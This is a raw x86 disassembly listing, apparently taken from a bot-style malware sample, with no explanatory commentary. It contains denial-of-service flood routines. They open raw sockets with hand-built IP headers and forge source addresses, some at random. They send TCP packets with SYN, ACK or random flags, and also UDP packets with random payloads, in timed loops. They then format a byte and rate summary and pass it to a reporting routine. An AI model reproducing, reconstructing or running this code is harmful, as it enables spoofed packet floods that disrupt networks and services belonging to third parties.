var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_9F]
push 0Eh
mov [eax+19Ch], esi
pop ecx
xor eax, eax
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, ds:dword_4270B0
call edi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
push 0FFh
push 3
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_414A8A
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_437C24
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414A6A
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409869
add esp, 14h
loc_414A6A: ; CODE XREF: sub_4149C1+84�j
lea eax, [ebp+var_440]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414A8A: ; CODE XREF: sub_4149C1+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_414B08
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset unk_437BEC
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_414AE8
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409869
add esp, 14h
loc_414AE8: ; CODE XREF: sub_4149C1+102�j
lea eax, [ebp+var_440]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414B08: ; CODE XREF: sub_4149C1+DF�j
lea eax, [ebp+var_23C]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_414B78
lea eax, [ebp+var_440]
push offset unk_437BCC
push eax
call sub_41C266
cmp [ebp+var_A8], ebx
pop ecx
pop ecx
jnz short loc_414B58
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409869
add esp, 14h
loc_414B58: ; CODE XREF: sub_4149C1+172�j
lea eax, [ebp+var_440]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414B78: ; CODE XREF: sub_4149C1+157�j
push 10h
lea eax, [ebp+var_44]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_44], 2
push ebx
call dword_4CB9D4 ; htons
mov [ebp+var_42], ax
lea eax, [ebp+var_23C]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_40], eax
mov [ebp+arg_0], ebx
call edi ; GetTickCount
mov [ebp+var_30], eax
loc_414BB0: ; CODE XREF: sub_4149C1+430�j
call edi ; GetTickCount
sub eax, [ebp+var_30]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_B4]
ja loc_414E74
push 28h
mov [ebp+var_2C], 45h
call dword_4CB9D4 ; htons
cmp [ebp+var_B0], ebx
mov [ebp+var_2A], ax
mov [ebp+var_28], si
mov [ebp+var_26], bx
mov [ebp+var_24], 80h
mov [ebp+var_23], 6
mov [ebp+var_22], bx
jz short loc_414C23
call sub_41C2C2
mov esi, eax
shl esi, 8
call sub_41C2C2
add esi, eax
shl esi, 8
call sub_41C2C2
add esi, eax
shl esi, 8
call sub_41C2C2
add esi, eax
push 1
mov [ebp+var_20], esi
pop esi
jmp short loc_414C39
; ---------------------------------------------------------------------------
loc_414C23: ; CODE XREF: sub_4149C1+233�j
push [ebp+var_240]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_20], eax
loc_414C39: ; CODE XREF: sub_4149C1+260�j
mov eax, [ebp+var_40]
cmp [ebp+var_B8], ebx
mov [ebp+var_1C], eax
jnz short loc_414C57
call sub_41C2C2
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_414C5D
; ---------------------------------------------------------------------------
loc_414C57: ; CODE XREF: sub_4149C1+284�j
push [ebp+var_B8]
loc_414C5D: ; CODE XREF: sub_4149C1+294�j
call dword_4CB9D4 ; htons
mov [ebp+var_16], ax
call sub_41C2C2
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4CB9D4 ; htons
push 12345678h
mov [ebp+var_18], ax
call dword_4CB9D0 ; htonl
mov [ebp+var_14], eax
lea eax, [ebp+var_1BC]
push offset aSyn ; "syn"
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_414CAD
mov [ebp+var_10], ebx
mov [ebp+var_B], 2
jmp short loc_414D09
; ---------------------------------------------------------------------------
loc_414CAD: ; CODE XREF: sub_4149C1+2E1�j
lea eax, [ebp+var_1BC]
push offset aAck ; "ack"
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_414CCD
mov [ebp+var_10], ebx
mov [ebp+var_B], 10h
jmp short loc_414D09
; ---------------------------------------------------------------------------
loc_414CCD: ; CODE XREF: sub_4149C1+301�j
lea eax, [ebp+var_1BC]
push offset aRandom_0 ; "random"
push eax
call sub_41C2E0
pop ecx
test eax, eax
pop ecx
jz short loc_414D09
call sub_41C2C2
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_10], edx
call sub_41C2C2
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_B], dl
loc_414D09: ; CODE XREF: sub_4149C1+2EA�j
; sub_4149C1+30A�j ...
push 200h
mov [ebp+var_C], 50h
call dword_4CB9D4 ; htons
mov [ebp+var_A], ax
mov eax, [ebp+var_20]
mov [ebp+var_64], eax
mov eax, [ebp+var_1C]
push 14h
mov [ebp+var_6], bx
mov [ebp+var_8], bx
mov [ebp+var_60], eax
mov [ebp+var_5C], bl
mov [ebp+var_5B], 6
call dword_4CB9D4 ; htons
mov [ebp+var_5A], ax
lea eax, [ebp+var_64]
push 20h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41CD20
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_80]
push eax
call sub_41CD20
lea eax, [ebp+var_A0]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_8], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41CD20
lea eax, [ebp+var_18]
push 14h
push eax
lea eax, [ebp+var_8C]
push eax
call sub_41CD20
push 4
lea eax, [ebp+var_78]
push ebx
push eax
call sub_41BF70
add esp, 44h
lea eax, [ebp+var_A0]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_22], ax
lea eax, [ebp+var_2C]
push 14h
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41CD20
add esp, 14h
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
lea eax, [ebp+var_A0]
push 3Ch
push eax
push [ebp+var_4]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414DF6
inc [ebp+arg_0]
jmp loc_414BB0
; ---------------------------------------------------------------------------
loc_414DF6: ; CODE XREF: sub_4149C1+42B�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
push offset unk_437B7C
lea eax, [ebp+var_440]
push 200h
push eax
call sub_41C360
add esp, 18h
cmp [ebp+var_A8], ebx
jnz short loc_414E54
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409869
add esp, 14h
loc_414E54: ; CODE XREF: sub_4149C1+46E�j
lea eax, [ebp+var_440]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_414E74: ; CODE XREF: sub_4149C1+203�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_B4]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_23C]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_440]
push offset unk_437B2C
push eax
call sub_41C266
add esp, 1Ch
cmp [ebp+var_A8], ebx
jnz short loc_414EE5
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_409869
add esp, 14h
loc_414EE5: ; CODE XREF: sub_4149C1+4FF�j
lea eax, [ebp+var_440]
push eax
call sub_415D38
push [ebp+var_BC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_4149C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F05 proc near ; CODE XREF: sub_41500F+19A�p
; sub_41500F+1A9�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_0]
push esi
xor esi, esi
cmp eax, 1
mov [ebp+arg_4], esi
jle short loc_414F31
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_414F23: ; CODE XREF: sub_414F05+26�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_414F23
pop edi
cmp eax, 1
loc_414F31: ; CODE XREF: sub_414F05+12�j
jnz short loc_414F3E
mov al, [edx]
mov byte ptr [ebp+arg_4], al
movzx eax, word ptr [ebp+arg_4]
add esi, eax
loc_414F3E: ; CODE XREF: sub_414F05:loc_414F31�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
pop ebp
retn
sub_414F05 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F57 proc near ; DATA XREF: sub_401ACD+6C68�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41C159
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4CBA14 ; inet_addr
push eax
lea esi, [ebp+var_194]
sub esp, 194h
push 65h
pop ecx
mov edi, esp
rep movsd
call sub_41500F
add esp, 19Ch
push eax
lea eax, [ebp+var_394]
push offset unk_437C58
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414FF2
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409869
add esp, 14h
loc_414FF2: ; CODE XREF: sub_414F57+79�j
lea eax, [ebp+var_394]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
sub_414F57 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41500F proc near ; CODE XREF: sub_414F57+54�p
var_CC = byte ptr -0CCh
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_A3 = byte ptr -0A3h
var_A2 = word ptr -0A2h
var_A0 = byte ptr -0A0h
var_8C = byte ptr -8Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_68 = byte ptr -68h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_28 = byte ptr -28h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_194 = dword ptr 19Ch
arg_198 = dword ptr 1A0h
push ebp
mov ebp, esp
sub esp, 0CCh
push ebx
push esi
mov esi, ds:dword_4270B0
xor ebx, ebx
push edi
mov [ebp+var_4], ebx
call esi ; GetTickCount
push 0FFh
push 3
push 2
mov [ebp+var_10], eax
call dword_4CBA54 ; socket
mov [ebp+var_8], eax
call esi ; GetTickCount
push eax
call sub_41C2B8
pop ecx
mov edi, 578h
push edi
push 9
push 1
call sub_418BD1
pop ecx
pop ecx
push eax
lea eax, [ebp+var_28]
push eax
call sub_41BF70
add esp, 0Ch
mov esi, 5A0h
loc_415069: ; CODE XREF: sub_41500F+235�j
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_198]
ja loc_415249
cmp dword_4CF180, ebx
jnz short loc_4150E8
push 10h
pop eax
mov [ebp+var_14], eax
push eax
lea eax, [ebp+var_68]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_68]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
push 0FFh
push 1
call sub_418BD1
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_62]
push eax
movzx eax, [ebp+var_63]
push eax
movzx eax, [ebp+var_64]
push eax
lea eax, [ebp+var_CC]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41C266
add esp, 18h
jmp short loc_4150FB
; ---------------------------------------------------------------------------
loc_4150E8: ; CODE XREF: sub_41500F+7E�j
lea eax, [ebp+var_CC]
push offset dword_4CEB60
push eax
call sub_41C890
pop ecx
pop ecx
loc_4150FB: ; CODE XREF: sub_41500F+D7�j
lea eax, [ebp+var_CC]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp+var_C], eax
mov eax, [ebp+var_58]
and al, 45h
push esi
or al, 45h
mov [ebp+var_54], 10h
mov [ebp+var_58], eax
call dword_4CB9D4 ; htons
mov [ebp+var_52], ax
call sub_41C2C2
mov [ebp+var_50], ax
mov eax, [ebp+var_C]
mov [ebp+var_48], eax
mov eax, [ebp+arg_194]
mov [ebp+var_4E], 40h
mov [ebp+var_4C], 40h
mov [ebp+var_4B], 6
mov [ebp+var_4A], bx
mov [ebp+var_44], eax
call sub_41C2C2
mov [ebp+var_40], ax
call sub_41C2C2
mov [ebp+var_3E], ax
call sub_41C2C2
mov [ebp+var_3C], eax
call sub_41C2C2
mov [ebp+var_38], eax
mov eax, [ebp+var_34]
and ax, 0FF50h
push 14h
or al, 50h
mov byte ptr [ebp+var_34+2], 18h
mov word ptr [ebp+var_34], ax
mov ax, [ebp+var_3E]
mov [ebp+var_76], ax
mov eax, [ebp+var_44]
mov [ebp+var_74], eax
lea eax, [ebp+var_58]
push eax
mov [ebp+var_30], 787Dh
mov [ebp+var_2E], bx
mov [ebp+var_2C], bx
mov [ebp+var_78], 2
call sub_414F05
mov [ebp+var_4A], ax
lea eax, [ebp+var_58]
push 28h
push eax
call sub_414F05
mov eax, [ebp+var_48]
add esp, 10h
mov [ebp+var_AC], eax
mov eax, [ebp+var_44]
push 58Ch
mov [ebp+var_A8], eax
mov [ebp+var_A4], bl
mov [ebp+var_A3], 6
call ds:dword_4271F4 ; htons
mov [ebp+var_A2], ax
lea eax, [ebp+var_A0]
push 14h
push eax
lea eax, [ebp+var_40]
push eax
call sub_41CD20
lea eax, [ebp+var_8C]
push edi
push eax
lea eax, [ebp+var_28]
push eax
call sub_41CD20
lea eax, [ebp+var_AC]
push 598h
push eax
call sub_414F05
add esp, 20h
mov [ebp+var_2E], ax
push 10h
lea eax, [ebp+var_78]
push eax
push ebx
lea eax, [ebp+var_58]
push esi
push eax
push [ebp+var_8]
call dword_4CBA38 ; sendto
inc [ebp+var_4]
jmp loc_415069
; ---------------------------------------------------------------------------
loc_415249: ; CODE XREF: sub_41500F+72�j
push [ebp+var_8]
call dword_4CBA6C ; closesocket
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41500F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41525A proc near ; DATA XREF: sub_401ACD+4B97�o
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov edx, [ebp+arg_0]
push esi
mov eax, 85h
push edi
mov ecx, eax
mov esi, edx
lea edi, [ebp+var_214]
sub esp, 214h
rep movsd
mov ecx, eax
lea esi, [ebp+var_214]
mov edi, esp
mov dword ptr [edx+210h], 1
rep movsd
call sub_4152D1
add esp, 214h
push eax
lea eax, [ebp+var_414]
push offset unk_437C8C
push eax
call sub_41C266
lea eax, [ebp+var_414]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
add esp, 14h
push 0
call ds:dword_4270D4 ; ExitThread
sub_41525A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152D1 proc near ; CODE XREF: sub_41525A+3B�p
var_254 = byte ptr -254h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_84 = byte ptr 8Ch
arg_104 = byte ptr 10Ch
arg_184 = byte ptr 18Ch
arg_208 = dword ptr 210h
arg_20C = dword ptr 214h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
mov ebx, 0FFh
push edi
push ebx
push 3
push 2
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_41530F
lea eax, [ebp+var_254]
push offset unk_437E7C
push eax
call sub_41C266
pop ecx
xor edi, edi
pop ecx
jmp loc_4155D8
; ---------------------------------------------------------------------------
loc_41530F: ; CODE XREF: sub_4152D1+22�j
lea ecx, [ebp+var_14]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_14], 1
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_41533B
call dword_4CB968 ; WSAGetLastError
push eax
push offset unk_437E2C
jmp short loc_415356
; ---------------------------------------------------------------------------
loc_41533B: ; CODE XREF: sub_4152D1+5A�j
lea eax, [ebp+arg_4]
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_41536A
call dword_4CB968 ; WSAGetLastError
push eax
push offset unk_437DE8
loc_415356: ; CODE XREF: sub_4152D1+68�j
lea eax, [ebp+var_254]
push eax
call sub_41C266
add esp, 0Ch
jmp loc_4155D8
; ---------------------------------------------------------------------------
loc_41536A: ; CODE XREF: sub_4152D1+77�j
push edi
mov [ebp+var_24], 2
call dword_4CB9D4 ; htons
mov [ebp+var_22], ax
lea eax, [ebp+arg_4]
push eax
call ds:dword_4271F0 ; inet_addr
mov esi, ds:dword_4270B0
mov [ebp+var_20], eax
call esi ; GetTickCount
mov [ebp+var_8], eax
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_254]
push offset unk_437DBC
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+arg_20C], edi
jnz short loc_4153D3
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_4153D3: ; CODE XREF: sub_4152D1+E0�j
mov [ebp+var_4], edi
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, eax
lea eax, [ebp+arg_104]
push eax
call sub_41C159
cmp esi, eax
pop ecx
ja loc_41558E
mov esi, 41Ch
jmp short loc_415407
; ---------------------------------------------------------------------------
loc_415402: ; CODE XREF: sub_4152D1+2B7�j
mov ebx, 0FFh
loc_415407: ; CODE XREF: sub_4152D1+12F�j
cmp dword_4CF180, edi
jnz short loc_415461
push 10h
pop eax
mov [ebp+var_10], eax
push eax
lea eax, [ebp+var_34]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_34]
push eax
push [ebp+arg_0]
call dword_4CB978 ; getsockname
push ebx
push 1
call sub_418BD1
pop ecx
pop ecx
push eax
movzx eax, [ebp+var_2E]
push eax
movzx eax, [ebp+var_2F]
push eax
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_54]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_41C266
add esp, 18h
jmp short loc_415471
; ---------------------------------------------------------------------------
loc_415461: ; CODE XREF: sub_4152D1+13C�j
lea eax, [ebp+var_54]
push offset dword_4CEB60
push eax
call sub_41C890
pop ecx
pop ecx
loc_415471: ; CODE XREF: sub_4152D1+18E�j
push esi
mov byte_4CED60, 45h
call dword_4CB9D4 ; htons
mov word_4CED62, ax
lea eax, [ebp+var_54]
push eax
mov word_4CED64, 1
mov word_4CED66, di
mov byte_4CED68, 80h
mov byte_4CED69, 11h
mov word_4CED6A, di
call dword_4CBA14 ; inet_addr
mov dword_4CED6C, eax
mov eax, [ebp+var_20]
mov dword_4CED70, eax
lea eax, [ebp+arg_84]
push eax
mov word_4CED7A, di
call sub_41C159
test eax, eax
pop ecx
jnz short loc_4154E9
call sub_41C2C2
cdq
mov ecx, 401h
idiv ecx
push edx
jmp short loc_4154F7
; ---------------------------------------------------------------------------
loc_4154E9: ; CODE XREF: sub_4152D1+206�j
lea eax, [ebp+arg_84]
push eax
call sub_41C159
pop ecx
push eax
loc_4154F7: ; CODE XREF: sub_4152D1+216�j
call dword_4CB9D4 ; htons
mov word_4CED76, ax
call sub_41C2C2
cdq
mov ecx, 401h
push 408h
idiv ecx
mov word_4CED74, dx
call dword_4CB9D4 ; htons
push 400h
mov word_4CED78, ax
call sub_41C2C2
cdq
idiv ebx
push edx
push offset dword_4CED7C
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_24]
push 10h
push eax
push edi
push esi
push offset byte_4CED60
push [ebp+var_C]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_415607
inc [ebp+var_4]
call ds:dword_4270B0 ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, eax
lea eax, [ebp+arg_104]
push eax
call sub_41C159
cmp ebx, eax
pop ecx
jbe loc_415402
loc_41558E: ; CODE XREF: sub_4152D1+124�j
push [ebp+var_C]
call dword_4CBA6C ; closesocket
mov esi, [ebp+var_4]
lea eax, [ebp+arg_104]
push eax
imul esi, 41Ch
call sub_41C159
pop ecx
xor edx, edx
mov ecx, eax
mov eax, esi
shr eax, 0Ah
div ecx
shr esi, 14h
push eax
push esi
push [ebp+var_4]
lea eax, [ebp+arg_4]
push eax
push offset unk_437D58
loc_4155C9: ; CODE XREF: sub_4152D1+34A�j
lea eax, [ebp+var_254]
push eax
call sub_41C266
add esp, 18h
loc_4155D8: ; CODE XREF: sub_4152D1+39�j
; sub_4152D1+94�j
cmp [ebp+arg_20C], edi
jnz short loc_415600
push edi
lea eax, [ebp+var_254]
push [ebp+arg_208]
push eax
lea eax, [ebp+arg_184]
push eax
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_415600: ; CODE XREF: sub_4152D1+30D�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_415607: ; CODE XREF: sub_4152D1+28B�j
push [ebp+var_4]
push esi
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+arg_4]
push eax
push offset unk_437CCC
jmp short loc_4155C9
sub_4152D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41561D proc near ; DATA XREF: sub_401ACD+6283�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
call sub_41C159
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call sub_41C159
pop ecx
push eax
lea eax, [ebp+var_210]
push eax
call dword_4CBA14 ; inet_addr
push eax
call sub_4157BA
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset unk_437EA8
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4156B2
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409869
add esp, 14h
loc_4156B2: ; CODE XREF: sub_41561D+73�j
lea eax, [ebp+var_414]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_41561D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156D1 proc near ; CODE XREF: sub_4157BA+194�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
cmp [ebp+arg_C], 0
push esi
push edi
jnz short loc_4156FA
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4271F8 ; connect
jmp loc_4157B6
; ---------------------------------------------------------------------------
loc_4156FA: ; CODE XREF: sub_4156D1+13�j
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
mov [ebp+var_8], edi
call ds:dword_4271E0 ; ioctlsocket
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4CB97C ; connect
push [ebp+arg_C]
lea eax, [ebp+var_210]
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
push 0
push eax
lea eax, [ebp+var_10C]
mov [ebp+var_20C], esi
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_210], edi
call dword_4CB9BC ; select
test eax, eax
jnz short loc_41575E
or eax, 0FFFFFFFFh
jmp short loc_4157B6
; ---------------------------------------------------------------------------
loc_41575E: ; CODE XREF: sub_4156D1+86�j
or edi, 0FFFFFFFFh
cmp eax, edi
jnz short loc_415769
loc_415765: ; CODE XREF: sub_4156D1+B8�j
; sub_4156D1+DC�j
mov eax, edi
jmp short loc_4157B6
; ---------------------------------------------------------------------------
loc_415769: ; CODE XREF: sub_4156D1+92�j
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jnz short loc_41578B
lea eax, [ebp+var_210]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jz short loc_415765
loc_41578B: ; CODE XREF: sub_4156D1+A7�j
lea eax, [ebp+arg_0]
mov [ebp+arg_0], 4
push eax
lea eax, [ebp+var_4]
push eax
push 1007h
push 0FFFFh
push esi
call ds:dword_4271C8 ; getsockopt
cmp eax, edi
jz short loc_415765
mov eax, [ebp+var_4]
neg eax
sbb eax, eax
loc_4157B6: ; CODE XREF: sub_4156D1+24�j
; sub_4156D1+8B�j ...
pop edi
pop esi
leave
retn
